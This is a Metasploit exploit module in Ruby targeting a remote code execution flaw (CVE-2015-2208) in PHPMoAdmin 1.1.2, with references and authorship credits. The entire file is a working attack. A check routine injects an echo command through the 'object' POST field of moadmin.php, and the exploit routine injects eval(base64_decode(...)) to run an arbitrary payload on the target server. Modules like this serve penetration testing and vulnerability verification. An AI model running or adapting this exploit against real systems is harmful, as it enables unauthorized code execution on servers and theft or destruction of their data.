Files

85 lines
2.3 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'PHPMoAdmin 1.1.2 Remote Code Execution',
'Description' => %q{
This module exploits an arbitrary PHP command execution vulnerability due to a
dangerous use of eval() in PHPMoAdmin.
},
'Author' => [
'Pichaya Morimoto pichaya[at]ieee.org', # Public PoC
'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2015-2208' ],
[ 'EDB', '36251' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2015/Mar/19' ],
[ 'URL', 'https://seclists.org/oss-sec/2015/q1/743' ]
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
[ 'PHPMoAdmin', {} ],
],
'DisclosureDate' => '2015-03-03',
'DefaultTarget' => 0,
'Notes' => {
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, "The URI path of the PHPMoAdmin page", "/"])
]
)
end
def check
testrun = Rex::Text::rand_text_alpha(10)
res = send_request_cgi({
'uri' => normalize_uri(target_uri, 'moadmin.php'),
'method' => 'POST',
'vars_post' =>
{
'object' => "1;echo '#{testrun}';exit",
}
})
if res and res.body.include?(testrun)
return Exploit::CheckCode::Vulnerable('The target is vulnerable')
end
Exploit::CheckCode::Safe('The target is not vulnerable')
end
def exploit
print_status("Executing payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri, 'moadmin.php'),
'method' => 'POST',
'vars_post' =>
{
'object' => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
}
})
end
end